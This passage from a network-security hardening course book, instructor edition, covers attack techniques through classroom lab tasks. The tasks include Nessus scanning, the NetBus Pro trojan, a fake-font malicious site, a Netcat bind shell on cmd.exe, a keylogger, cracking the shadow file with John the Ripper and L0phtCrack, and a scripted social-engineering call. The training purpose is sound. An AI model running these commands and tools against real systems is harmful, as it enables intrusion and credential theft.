5. Ignore any warning messages that are displayed, and wait for theinstaller script to complete. This will take several minutes, so please bepatient.

6. If necessary, press Enter to accept the default file location.

7. Observe the Congratulation message that is displayed when installationis complete. The message lists instructions for several tasks related to settingup Nessus. Let’s create a certificate first. Press Enter.

8. Enter nessus-mkcert and accept the default values for lifetimes.

9. Enter the applicable data for Country, State/Province, and Location.

10. For Organization, enter SCNPclass.

11. After the certificates are created, press Enter to return to the command line.Next, we’ll create a user.

12. Enter nessus-adduser and for Login, enter testuser.

13. For Authentication, press Enter to select the default of password.

14. For Password, enter password.

15. For the Rules, you will use an Empty Rule Set. Press Ctrl+D to finish thispart of the Nessus setup.

16. Answer Yes when you are prompted.

Scanning for Vulnerabilities with NessusWe will now see how Nessus is used to scan a target network. You first need tostart the Nessus daemon; then, you can scan hosts and networks for securityvulnerabilities.

Provide students with thelocation of the Nessus

installer script file.

510 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 564: SCNP Hardening

TASK 8D-6Using Nessus for Vulnerability Scanning

Setup: You are logged in to Linux as root, and the Nessus tool hasbeen installed, and a nessus user created.

1. If necessary, open a Terminal Window, and enter nessusd -D to start theNessus daemon. After a short pause, the command line is displayed.

2. Enter nessus to open the Nessus Setup window.

3. On the Nessusd Host tab, log in with the user account testuser and thepassword password. Click Log In.

4. Click OK to close the SSL Setup window, then click Yes to accept thecertificate.

5. Click OK to close the Warning box.

6. Once you are logged in, on the Target Selection tab, enter a target IPaddress in the class.

7. Click the Start The Scan button. This scan will take a few minutes tocomplete, so please be patient.

8. When the scan has ended, view the results.

9. Under Subnet, select the target. Under Host, select the target. UnderPort, select a port that has an exclamation point icon. Under Severity,select Security Warning, and read the information displayed in thelower-right pane.

10. Under Port, select a port that has a red circle with a yellow bar insideit. Under Severity, select Security Hole, and read the information dis-played in the lower-right pane.

11. Observe that you can even save the report in several formats on thehard drive for later review.

12. Close all open windows. You can save the report if you like.

You might need to move thewindow up to reach the StartThe Scan button.

Lesson 8: Attack Techniques 511

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 565: SCNP Hardening

Topic 8EViruses, Worms, and Trojan HorsesWhen networks were not as big a part of business and everyday life as they arenow, the concept of having a virus on the computer was unknown to most people.Today, there are millions and millions of people who are aware, in one way oranother, that there are such things as computer viruses, and that they usually arebad. Although all these people are aware that such creatures exist, many networkadministrators cannot tell the difference between a virus and a worm.

Differentiating Between a Virus and a WormIn a similar vein to every computer criminal being lumped into the term hackerby the media, the same goes for the virus and worm (as well as the Trojan Horse,for that matter). So, virtually every incident with one of these programs will bereferred to by the major media as a virus.

For this topic, we shall refer to the NSA definitions:

• A virus is a program that can infect other programs by modifying them toinclude a possibly evolved copy of itself.

• A worm is an independent program that replicates from machine to machineacross network connections, often clogging networks and information sys-tems as it spreads.

To put this in perspective, the names of these programs are appropriate. A virusrequires a host while a worm does not. The worm is self-sufficient, and the virusis not. This distinction should make it clearly obvious that a worm is more dan-gerous to the network than a virus is.

The vast majority of viruses used to be transmitted on floppy disks. But, thanksto the wonderful connectivity the Internet provides, the hacker does not need tobe limited to getting a floppy disk into the network to do the job. A simple emailwill do. Even with all the publicity about opening attachments, spreading a virusor worm via an email attachment is still the most prevalent way to spread theprogram.

Outlook and Outlook Express became the method of choice for transmitting emailviruses and worms over the last few years. Even casual users became aware ofthe names Melissa, Worm.Explore.Zip, BubbleBoy, ILoveYou, and so on. Thesesimple worms would simply replicate themselves to the names and addresses in auser’s Address Book. This made the worm seem to come from a trusted source. Itwas due to this deception that these worms moved around networks so quickly.

Sending a virus or worm hidden in a Trojan Horse is one of the common ways tomove a malicious program around the network.

Viruses, Worms, and TrojanHorses

512 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 566: SCNP Hardening

The Trojan HorseTo complement the worm and virus discussion, one needs to discuss the TrojanHorse. Generally, a Trojan Horse is a program disguised as something else toallow for the installation and execution of one of the previously mentionedremote-control applications. The “something else” that intelligent hackers willoften disguise their application as are small game programs.

There is a reason for this. Most people cannot help but play a new, addictive,small, easy-to-play game. And, if it is simple and fun enough, it will circulatearound an office very quickly.

Perhaps the most infamous example of the Trojan Horse doing this very functionis the game Whack-A-Mole. This game is, in fact, the Trojan Horse for NetBus.This program spread around many companies very quickly and is still in widecirculation. Most people will be very surprised when you inform them they haverun a Trojan Horse program. Figure 8-22 shows some of the capabilities ofNetBus. More about NetBus is included later in this topic.

Figure 8-22: An example of the control portion of Netbus version 1.70. Notice the differentoptions on the various buttons.

Another very smart Trojan Horse example is BoSniffer. This program is billed asa program to search out and clean Back Orifice from a given system, when it isreally Back Orifice itself! So the net result is that running this program to removeBack Orifice from a system actually installs it. Very clever.

The SubSeven TrojanSubSeven is one the most widely used Trojan Horse programs available. Mosthackers are aware of SubSeven and what it can do. In order for you to properlyunderstand how to defend against this program, you must use it firsthandyourself.

Controlling the Target

Lesson 8: Attack Techniques 513

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 567: SCNP Hardening

A common way for SubSeven to be packaged is as a zip file containing threeEXE files. These three files are the files used to run and manage the program.They are:

• Server.exe. This is the file that is installed on the victim’s computer.

• Sub7.exe. This is the file used by the attacker to control the victim’scomputer.

• EditServer.exe. This is the file that can be used to modify the availableoptions that the server.exe can provide to the attack.

Some of the options that the EditServer.exe has are:

• Define the port on the victim that SubSeven will use.

• Define a password to protect the server program.

• Define email options. These options include:

— Email every pressed key to an email address.

— Email every password to an attacker.

— Email passwords for connections to the Internet to the attacker.

• Define notification options. This can be most dangerous, as the notificationoptions are:

— Email the attacker every time the server application runs.

— Notify the attacker via IRC when the server application runs.

— Notify the attacker via ICQ when the server application runs.

When SubSeven is installed on a computer, several files and Registry entries willbe modified. Examples of the files that can be found on an infected computer are:

• Server.exe

• Rundll1.exe

• Systray.dll

• Task_Bar.exe

• FAVPNMCFEE.dll

• MVOKH_32.dll

• Nodll.exe

• Watching.dll

In addition to files added to the victim computer, several config files may bemodified as well. Examples of the modified files are:

• Win.ini—this file will have a modification to the load= or run= statement.

• System.ini—this file will have a modification to the shell= statement.

NetBusAny discussion of Trojan Horse programs would be incomplete without examplesand using NetBus. Most hackers are aware of NetBus and what it can do. Inorder for you to properly understand how to defend against this program, youmust use it firsthand yourself.

NetBus uses a two-part system to control a victim computer. There is a serverprogram that must be executed on the target computer and a client program thatthe attacker will run to take control of the target.

514 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 568: SCNP Hardening

The server program can be renamed to anything the attacker wants to use, andoften will be in order to better hide the application from detection. Commonexamples of the renamed server program could be Explore.exe or winsys32.exe,with the point being to make the application look like a system file.

Different versions of NetBus have used different names for the server program. Ithas been called sysedit.exe, patch.exe, and server.exe. NetBus commonly usesport 12345 to connect, although newer releases allow for modification of theserver port to use.

Regardless of the server name, it should be found in the Registry in the followinglocation: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

Several versions of NetBus are available on the Internet. In this section, we willdiscuss two different versions: one slightly older version, named NetBus 1.7, anda newer version, named NetBus Pro. Then, you will try out NetBus Pro in ahands-on activity.

NetBus 1.7NetBus 1.7 has a simple interface, with options such as opening and closing theCD-ROM or sending system messages. It also has the ability to provide moreserious functions, such as shutting down the remote computer, viewing remotefiles, and sending the remote host to a URL. While the last option may not seemthat critical, in an environment where Internet use is a strict and regulated policy,sending a remote computer to a known disallowed URL can have a seriousimpact.

Figure 8-23: An example of available options for NetBus version 1.7.

NetBus ProNetBus Pro is a more advanced version of NetBus than version 1.7. Many of theoptions are the same; however, there are differences, as you will see. Figure 8-24shows some of the available options in NetBus Pro.

Lesson 8: Attack Techniques 515

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 569: SCNP Hardening

Figure 8-24: Options available in NetBus Pro.

TASK 8E-1Using NetBus Pro

Setup: You are logged on to Linux as root. Your instructor will assigneach of you a role as an attacking computer or a targetcomputer. For instance, if you were designated as Student_Pearlier in the course, you might now be designated as anattacker for this task.

Note:Perform the following step on all student computers.

1. Boot to Windows 2000, and log on as the renamed Administratoraccount. Run the NetBus Pro setup program from the location providedby your instructor.

Note: Perform the following step only if you are designated as an attackingcomputer for this task.

2. Run the NetBus Pro application to open the control portion of theprogram.

Note: Perform step 3 and step 4 only if you are designated as a target com-puter for this task.

3. Start NetBus Server, click Settings, and check Accept Connections.

4. Under Visibility Of Server, select Only In Tasklist, and click OK.

Provide students with thelocation of the NetBus Pro

installation files.

516 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 570: SCNP Hardening

Note: Perform step 5 through step 7 only if you are designated as an attack-ing computer.

5. In the NetBus Pro application, choose Host→New, and enter the IPaddress of the target computer. Click OK. The target should now be listedin the GUI as a destination.

6. Right-click the target computer, and choose Connect.

7. Once you are connected, try some of the different options, such as open-ing and closing the CD-ROM bay, capturing screen images, keyboardlistening, and so forth.

Note: Perform the rest of this task on all student computers.

8. Close all open windows, and reboot to Windows 2000 as the renamedAdministrator account.

9. Repeat this task, switching roles with your partner.

Topic 8FMalicious Web SitesIn another lesson, you studied some of the techniques used by malicious Websites to target ordinary users. Indeed, most attacks targeting ordinary users arerather unsophisticated and depend on computerized social engineering to get thejob done—that is, getting the user to agree to something, such as downloading afile or clicking OK on some kind of executable, script, or batch file.

In the following task, the instructor will set up a simple and innocent-lookingWeb site. The Web site proclaims to help a user verify his or her browser’s secu-rity and offers various templates for the job. When the user clicks on a template,an error pops up telling the user that the required font was not found and offers alink to install the appropriate font with instructions to the user to click Open.When the user clicks on the link to the font, a popup shows up, the user clicksOpen, there’s a brief flicker on the screen, and the user has just installed some-thing malicious.

INSTRUCTOR TASK 8F-1Implementing a Malicious Web Site

Setup: Observe as your instructor performs this task on the instructormachine.

1. If necessary, log on to your Windows 2000 Server as the renamedAdministrator account.

2. Navigate to the \085545\Data\HTML Files folder on the course CD.

If time permits, allowstudents 5 to 10 minutes toexplore the NetBus options.

Lesson 8: Attack Techniques 517

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 571: SCNP Hardening

3. Copy the Malweb subfolder onto your boot partition, in the Inetpubfolder.

4. Navigate to the \WINNT\Help\iishelp\common folder.

5. Rename the 404b.htm file as 404b-old.htm.

6. From the Inetpub\Malweb folder, copy the file 404b.htm to the WINNT\Help\iishelp\common folder.

7. Start Internet Services Manager.

8. In the left pane, expand the host, right-click Default Web Site, andchoose Stop.

9. Right-click Default Web Site, and choose Properties.

10. Click the Home Directory tab. Browse to navigate to the Inetpub\Malweb folder and click OK.

11. Click the Documents tab, then click Add.

12. For Add Default Document, enter malweb.htm, and click OK.

13. Select malweb.htm, and click the Up Arrow button until the file is at thetop of the list.

14. Click OK.

15. If necessary, click OK to close the Inheritance Overrides informationbox.

16. Right-click Default Web Site, and choose Start.

Falling Victim to a Malicious Web SiteNow, let’s see what happens to the unsuspecting user when he or she happensupon the Malweb site that your instructor just implemented.

TASK 8F-2Visiting a Malicious Web Site

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. Start Internet Explorer.

2. In the Address box, enter http://172.17.10.1. If the Content Advisor opens,enter the password 1234 and click OK to be able to view the site.

You should be presented with a Web site indicating that your browser maynot be secure and that you can evaluate your browser’s security using atemplate.

518 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 572: SCNP Hardening

3. Click any one of the templates (T1, T2, or T3) to display a page that indi-cates a required font was not found.

4. Click the Back button, or click the link to go back to 172.17.10.1’s homepage.

5. Now, read the instructions regarding fonts.

6. You’re a savvy computer user, so place your mouse over the hyperlink inthe sentence “Please install the following font.”

7. At the bottom of your browser window, read the explanation for thelink. It should say http://172.17.10.1/acrylic1.fnt, so it’s OK—it’s only afont, not a malicious program. Your guard is down.

8. Open Windows Explorer, and navigate to the \085545\Data\HTML Filesfolder on your course CD. Examine the file acrylic1.fnt. Widen the FileName column to view the entire file name. This isn’t really a font file, it’sa command script!

9. Close all open windows.

Topic 8GGaining Control Over the SystemNetcat is a tool that can be used to connect to any computer it can listen on. Thisis part of the danger of using such a powerful tool. Sitting at a Windows 2000computer, you can gain control of a Linux box, and sitting at a Linux computer,you can gain control of a Windows computer. All without having to provide anyauthentication!

We will see how a system can be compromised by using Netcat.

TASK 8G-1Using Netcat

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account. Your instructor will tell you whether you are toplay the role of target computer or attacking computer.

Note:Perform step 1 through step 5 only if you are designated as a targetcomputer.

1. At the root of your boot partition, create a folder called nc.

2. Copy the Netcat files from the location provided by your instructor tothe new nc folder.

3. If necessary, unzip the Netcat files. Provide students with thelocation of the Netcat files.

Lesson 8: Attack Techniques 519

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 573: SCNP Hardening

4. Open a Command Prompt, and switch to the nc directory.

5. Enter nc -l -p 2020 -e cmd.exe.

Note: Perform step 6 through step 11 only if you are designated as an attack-ing computer.

6. Log on to Linux as root.

7. Open a Terminal Window.

8. Enter nc target_IP_address 2020.

9. Observe that you now have what looks very much like a Windows com-mand prompt. There is a very good reason for that—it is! Navigate aroundand see that you have full control, just as if you were sitting at the Win-dows machine with an open command prompt. Do not do anything thatwill disrupt the normal functions of the machine.

10. Enter exit to return to the Linux machine.

11. Reboot to Windows 2000 as the renamed Administrator account.

Note: Perform the next step only if you are designated as a target computer.

12. Close all open windows.

Topic 8HRecording KeystrokesAlthough the Trojan Horses have their place in attacking computers, they may bemore than the attacker needs. Perhaps the only desire is to track the keys that arepressed on a target computer. If this is the case, Trojan Horses, even though theymay have this ability, are too much.

Keystroke logging can be one of the most dangerous attacks to deal with, sincethe program can run below the level of the operating system and, therefore, beclose to impossible to detect. There are both hardware- and software-based imple-mentations of keystroke logging.

The level of difficulty of detection can also be connected to the level of difficultyin placing the keystroke-logging application on the target. For example, the hard-ware keystroke loggers require physical access to the target computer. In theevent that physical access is granted, these can be very hard to detect. But, beforewe get too deep into the world of hardware keylogging, let’s look at a softwarekeylogger.

If time permits andstudents are interested,

have them switch roles andrepeat this activity.

Keystroke and PasswordAttacks

520 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 574: SCNP Hardening

TASK 8H-1Using Software Keystroke Logging

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account, and all windows have been closed.

1. Create a new folder named Klogger.

2. Copy the Klogger program from the location specified by your instruc-tor to the new Klogger folder.

3. Double-click Klogger to start the application. The only indication thatsomething is happening is the display of the hourglass icon.

4. Open Notepad, and type a short message to yourself. Then closeNotepad; there is no need to save the file.

5. Switch to Explorer, open the Klogger folder, then open the klogger.txtfile, and read its contents.

6. Close all open windows, reboot, and log on to Windows 2000 Server asthe renamed Administrator account.

Hardware KeyloggersThe smallest loggers are simple devices that are connected between the keyboardcable and the computer. Without physically looking, there is no chance to detectthis application.

In the event that even a higher level of stealth is required, the next step is toreplace the keyboard altogether. By doing this, there is no clue that there is key-stroke logging implemented on this machine. All of the logging is done via a chipembedded in the new keyboard. The attacker needs only to retrieve the keyboardand download the data from the chip.

We can now look at our first hardware keystroke logger. Figure 8-25 shows asmall hardware device that can be placed between the keyboard and thecomputer. Once the device has been installed, the attacker can log keystrokes andcollect the data stored inside. The scary part about this kind of device is that it iscompletely independent of the operating system. A default installation using adevice, such as those manufactured by KeyGhost, allows all captured keystrokesto be displayed in any text editor simply by entering the command vghostlog.

Provide students with thelocation of the Kloggerfiles.

Lesson 8: Attack Techniques 521

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 575: SCNP Hardening

Figure 8-25: A keyboard-logging device. (Picture from keyghost.com.)

INSTRUCTOR TASK 8H-2Using a Keystroke-logging Keyboard

Objective: To observe the installation and use of a keystroke-loggingkeyboard.

1. Connect a keyboard that is designed to record keystrokes to yourinstructor machine. As shown in the graphic below, these types of key-boards usually don’t look any different from a standard keyboard.

2. Once the keyboard has been installed, show the class how it can be usedto collect data, as well as how to retrieve the data stored in it.

522 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 576: SCNP Hardening

Topic 8ICracking Encrypted PasswordsIf getting a physical key-logging device to the target for capturing passwords isnot an option, and it often isn’t, the next point a hacker must address is acquiringand cracking passwords. There are many tools available on the Internet for thistask, but for class purposes, we will look at three of the most popular ones:L0pht, L0pht LC3, and John the Ripper.

Cracking Passwords with L0phtOne of the most popular password-cracking tools is L0pht. This tool will down-load the passwords from a target computer, and then crack them. There are manyversion of L0pht, and the programmers have now teamed up with a legitimatesecurity company to create commercial products to use. Their commercial prod-ucts are used as legitimate administration tools to audit the strength of userpasswords.

L0pht 2.5Let’s take a look at one of the older versions of L0pht, version 2.5. In Figure8-26, you can see that password information has been pulled from the Registry.

Figure 8-26: An older version of L0pht, just after password information has been dumpedfrom the Registry.

Figure 8-27 shows some of the options available in version 2.5 of L0pht.

Lesson 8: Attack Techniques 523

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 577: SCNP Hardening

Figure 8-27: Some of the cracking options available in L0pht 2.5.

And Figure 8-28 shows the successful cracking of passwords.

Figure 8-28: Passwords are cracked!

L0pht LC4Now that you have seen an older version of L0pht, let’s look at one of its relatedapplications, L0phtCrack 4, or L0pht LC4. Figure 8-29 shows some of theoptions available in this application for gaining access to the passwords that youwant to crack.

524 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 578: SCNP Hardening

Figure 8-29: Options for getting encrypted passwords in L0phtCrack LC4.

Figure 8-30 shows the auditing and password-strength options.

Figure 8-30: L0phtCrack LC4 auditing and password strength options.

Figure 8-31 shows L0pht LC4 in action.

Lesson 8: Attack Techniques 525

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 579: SCNP Hardening

Figure 8-31: Password audit in progress.

TASK 8I-1Using L0pht LC4

Setup: You are logged on to Windows 2000 Server as the renamedAdministrator account.

1. Create a folder named LC4 on your hard drive.

2. Copy the LC4 setup program from the location provided by yourinstructor to the new LC4 folder.

3. Run LC4setup, accepting all defaults during the installation routine.

4. Open the Custom_GPO you created earlier in the course, and disable allpassword policies. Close the Custom_GPO when you are finished.

5. Create four new user accounts, assigning passwords as follows:

a. One password that is blank (null).

b. One password that is the same as the user name.

c. One password that contains only numbers.

d. One password that contains only random letters.

6. Start the L0pht LC4 application.

7. Click Trial. The LC4 Wizard opens.

If time is an issue, you canassign one-half of the

students to do the L0phtLC4 (Windows 2000)

exercise, and the remainingone-half of the students to

do the John the Ripper(Linux) exercise, so that

everyone can see thedifferences between the

password crackers withouthaving to use both in class.

Provide students with thelocation of the LC4

installation files.

526 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 580: SCNP Hardening

8. Click Next twice, then click Custom, and click Custom Options.

9. Uncheck Perform A Brute Force Attack On The Passwords, and clickOK.

10. Click Next twice, and then click Finish. The password audit startsautomatically.

11. While the audit is running, open the Task Manager on your computer,and note your current processor usage.

12. When the Auditing Session Complete message is displayed, click OK.

13. Review the results. At least some of the four easy passwords you assignedduring this task should be cracked. The more complex passwords that youcreated earlier in the course might be only partially cracked.

14. Close all open windows. You do not need to save changes.

Cracking Passwords with John the RipperThe passwords used in any operating system are critical to protect, and Linux isno different in this regard. Just as there are methods to crack the passwords inWindows NT or Windows 2000, there are methods to crack the passwords inLinux.

Two common password crackers are Crack and John the Ripper. In both cases, itis required to gain access to the password file, then have that file processed bythe cracking program.

These programs can use much of a computer’s resources, so running them on aproduction machine is not a good idea.

John the Ripper is among the newer password crackers available, and has gainedgreat notoriety as it is very fast, and can handle several password hashingalgorithms. We will now look at using John the Ripper to crack passwords inLinux (although a version has been ported to NT).

TASK 8I-2Using John the Ripper

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. Log in to Linux as root.

2. In the /root directory, create a new directory called JohnTR.

3. Copy the John the Ripper installation files from the location providedby your instructor to the new JohnTR directory. In most cases, you willbe provided with a compressed file called john-1.6.tar.gz, but if you are pro-vided with a directory called john-1.6, you can skip the next step. Provide students with the

location of the John theRipper installation files.

Lesson 8: Attack Techniques 527

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 581: SCNP Hardening

4. If necessary, open a Terminal Window, switch to the JohnTR directory,and unzip the john-1.6tar.gz file by using the gzip -djohn-1.6.tar.gz command. This command will unzip the files to a filecalled john-1.6.tar.

If necessary, untar the john-1.6.tar file by using the tar -xfjohn-1.6.tar command. This command will untar the file into adirectory called john-1.6.

5. Switch to the john-1.6 directory, and list its contents. This directory con-tains another directory that contains the source file.

6. Switch to the src directory to prepare for the installation.

7. To start the actual installation, enter make to display a list of system types.If your system type is matched, make a note of it.

8. If you have a matching system type, enter make system_type, wheresystem_type is the actual system type of your computer.

If you do not have a matching system type, enter make generic.

This command will start the installation. When it is finished, you will beready to run the John the Ripper application.

9. To get ready to run the application, enter cd .. to move up one directory,then enter cd run to move into the run directory.

10. In a Terminal Window, create four new user accounts, assigning pass-words as follows:

a. One password that is blank (null).

b. One password that is the same as the user name.

c. One password that contains only numbers.

d. One password that contains only random letters.

We now need to copy the password directories to a text file first so that wecan safely crack them.

11. Enter ./unshadow /etc/passwd /etc/shadow > pwd.txt. Next, we need tochange permissions on the text file so that John can work with it.

12. Enter chmod 600 pwd.txt. We are now ready to let John do his work andcrack our passwords.

13. Enter ./john pwd.txt.

14. Let the program run, watching for output on your screen. At least someof the passwords should be cracked.

15. When you are ready to move on, close all open windows.

Your instructor can help youdetermine if you have amatching system type.

528 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 582: SCNP Hardening

Topic 8JRevealing Hidden PasswordsUsing programs such as L0pht is not the only way of identifying passwords ofusers and applications on a system. Another method is to try to reveal the pass-words beneath the asterisks in Windows.

The programs in Windows generally use the asterisks only to mask the true pass-word below. Imagine removing a tablecloth to see the surface of the table below.The passwords are there; it is only a matter of removing the covering.

The tool we will use to do this is called Snadboy’s Revelation. Figure 8-32 andFigure 8-33 show this tool in action. In Figure 8-32, you can see a user’s pass-word being masked by the asterisks.

Figure 8-32: Creating a user and entering a password that is hidden from view byasterisks.

In Figure 8-33, Snadboy’s Revelation shows the unmasked password.

Lesson 8: Attack Techniques 529

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 583: SCNP Hardening

Figure 8-33: Place the crosshairs over the asterisks, and Snadboy’s Revelation will revealthe password for this user.

TASK 8J-1Revealing Hidden Passwords

1. Log on to Windows 2000 as the renamed Administrator account.

2. Create a new folder on your boot partition named Snadboy.

3. Copy the Snadboy installation program from the location provided byyour instructor to the new Snadboy folder.

4. If necessary, unzip the file, and extract it to the Snadboy folder.

5. Run the installation program, accepting all defaults.

6. Run Snadboy’s Revelation.

7. From the Start menu, choose Programs→Accessories→Communications→Internet Connection Wizard. Specify that you want to set up an Internetconnection manually, and click Next.

8. Specify that you want to connect through a LAN, and click Next threetimes.

9. For Display Name, enter test, and for Email Address, enter test@localhostand click Next.

10. For the POP3 and SMTP Server Names, enter localhost and click Next.

11. Leave the Account Name as displayed, enter the password 1qaz!QAZand leave the Wizard open.

12. Move the Snadboy window to the upper-right corner of your screen.

Provide students with thelocation of the Snadboy

installation files.

530 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 584: SCNP Hardening

13. Move the Wizard window to the lower-left corner of your screen.

14. Observe the Wizard window. The password for the user named test ismasked by a series of asterisks.

15. Switch to the Snadboy window, and drag the target-shaped cursor overthe masked password, and release the mouse button.

16. Observe the Snadboy window. The masked password is revealed.

17. Close all open windows.

Topic 8KSocial EngineeringSocial engineering takes advantage of some inherent human characteristics. Verygood hackers, in general, have quite a solid grasp of human psychology. This isan absolute must for the hacker to be able to perform social engineering well.Understanding how people generally react to given predictable situations allowshackers to use this knowledge to elicit the needed responses.

Most social engineering begins with the information learned during the network-reconnaissance and target-acquisition phases of the attack. This informationincludes phone and fax numbers, IP addresses, physical addresses, DNS namesand addresses, router names and addresses, email server names and addresses,billing contact names and email addresses, and so forth. This information pro-vides a good social engineer with most of what is required to begin the attack.

With just the information gained from network reconnaissance, there are severaldifferent avenues open to hackers. The two primary methods are to try to takeadvantage of either the users of the network or the Help Desk of the network.Both methods require roughly the same set of skills from the hacker, so both areused widely. Additionally, for this to be successful, the company needs to be bigenough that most employees have never heard of nor seen most of the otheremployees.

Let’s look at the first method: trying to take advantage of the users of a network.In this scenario, the hacker may call the front desk (any user would normallywork, the front desk is just one example) in the guise of being a network admin-istrator of the network. Having learned the name of the network administrator bychecking domain name registrations, the hacker calls as the network administratorto the user, requesting information. Many network users will simply respond towhat the network administrator wants and needs right away, because they believethat this is the person who controls their network usage. This is one of the keypsychological elements that the hacker will exploit.

As the hacker walks the user through a series of questions and scenarios, they arebuilding a relationship with the user. Soon enough, the user will give enoughinformation to allow the hacker to simply walk into the network at will. Thismethod is perhaps the most common social engineering technique, and it is useddaily!

Other Attacks

Lesson 8: Attack Techniques 531

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 585: SCNP Hardening

The other method is for the hacker to target the Help Desk for social engineering.This process usually requires a bit more acting ability and a strong personality topull off. It also requires a decent amount of information about the corporate man-agement of the given target. A name of a person quite high up on the corporateladder is required. Not high enough so everyone in the company instantly recog-nizes the name or the voice, but high enough in the structure so that people mightfeel fear by association of the title.

A common way to get the name of this high-level person is for the hacker to callto set up the fake meeting. The hacker calls reception, and says “Hi, this is Johnfrom XYZ. My boss asked me to set up a meeting with your HR Director, butshe was leaving the office when she asked me. What is the HR Director’s nameagain?” You get the idea.

Once the higher-up’s name is known, the hacker can call the Help Desk andbegin demanding something like, “My email is not working, reset my passwordright now, and how do I set it up again?” Instant access to the internal emailserver!

There are no restrictions on social engineering, which is why it is so effective.The options for a hacker to use social engineering are almost limitless—the onlyrestriction is the overall creativity of the hacker. Perhaps a hacker takes a part-time job at a local ISP for a while to gain intelligence. The entire reason theymay be there is to gain a different level of access to information about potentialtargets.

In any case, whether the target is a user, a Help Desk worker, or corporate clientsof an ISP, the general method hackers use is the same—use the human psyche totheir advantage.

TASK 8K-1Discussing Social Engineering Examples

1. Discuss and define examples of how social engineering can be used byan attacker to gain knowledge about a potential target.

Topic 8LCase Study: Social EngineeringTarget: “Good morning, XYZ Corp, how may I direct your call?”

Hacker, with just a bit of authority in the voice: “Good morning, actually I calledto speak with you. This is Warren from the Networking Department. Who is thisagain, just so I’m sure I have the right person?”

Target: “This is John, is there something wrong?”

532 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 586: SCNP Hardening

Hacker grins in response to the question, then: “No, John, not right now, but weare experiencing some intermittent problems. I just stepped out of a meeting withKevin, and we decided we needed to ask you and a few other users a fewquestions. They’ll be straightforward, not too technical, so don’t worry. OK,ready?” (Hacker uses a real employee name, gained during network reconnais-sance, to help build the image.)

Target: “Um, sure I guess. I’m not that great with the computer in that way. Imean I use Office really well, and stuff, but....”

Hacker: “You’ll be fine, John. Here we go. The first thing I need you to do isopen the command prompt. Go to your Run line and type command.”

Hacker waits.

Target: “Where do I type Run?”

Hacker sighs a bit, to pressure the Target, then grins even wider.

Hacker: “No, you don’t type Run. You see the Start button in the lower left-handcorner? Good, click it and go up to where it says Run. See it now? OK, great.You’re doing fine. OK, now type Command. Let me know when the black win-dow opens up on your screen.”

Target: “OK, it’s open now. Now what?”

Hacker: “Good, the first thing I need you to type is called Ipconfig, just type inthe letters I-p-c-o-n-f-i-g, then I’ll ask you a few more questions from thatscreen.”

Target: “How do you spell that again? Oh, never mind—I figured it out. OK,what do you want from this?”

Hacker: “Tell me what it says to the right of where it says IP Address, and whereit says Subnet Mask and Default Gateway.”

Hacker waits, then records Target’s responses.

Hacker: OK, thanks, now I want you to type in something similar, type Ipconfig,space, forward slash all.”

Target: “Uh, OK I got it. This is easy!”

Hacker: “Yes, it is, you’re doing great. Now, tell me what it says to the right ofDHCP Enabled, Host Name, Primary DNS Suffix, and DNS Servers....”

Hacker waits again, and records Target’s response.

Target: “OK, wow, that’s a lot of stuff, huh?”

Hacker: “Yes, it can be. OK, we just have a few more. Type in nbtstat, space,minus n. Then tell me what it says to the left of the word group.”

Hacker waits, then records Target’s response.

Target: “What is all this stuff anyway?”

Hacker: “These are the numbers I use to make sure you stay connected to theInternet, and that your email still functions right. By the way, have you had anyemail problems today?”

Target: “No, not really. At least I don’t think so.”

Lesson 8: Attack Techniques 533

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 587: SCNP Hardening

Hacker: “That’s good, I wasn’t sure if your computer was one of the ones thathad a problem yet or not. I’ll send you something in just a minute to check youremail configuration. Now one more thing to type in while you are where you areright now. Please type netstat, space, minus a. There might be a bigger list here.The column to the right, where it says State. I need you to find the ones that saylistening, and tell me what is to the left, under Proto...Yes, there could be quite afew.”

Hacker records Target’s response.

Target: “Phew, all right is that it?”

Hacker: “Almost. I’m sending you an email configuration program right now....Hang on....”

Hacker pauses dramatically, then: “OK, you should get it now.”

Target: “OK, what is this?”

Hacker: “Go ahead and double-click that, and tell me what the diagnostic windowsays when it is done.”

Target: “OK, hang on.... It says email server configuration OK, Client configura-tion OK. So, that’s good right?”

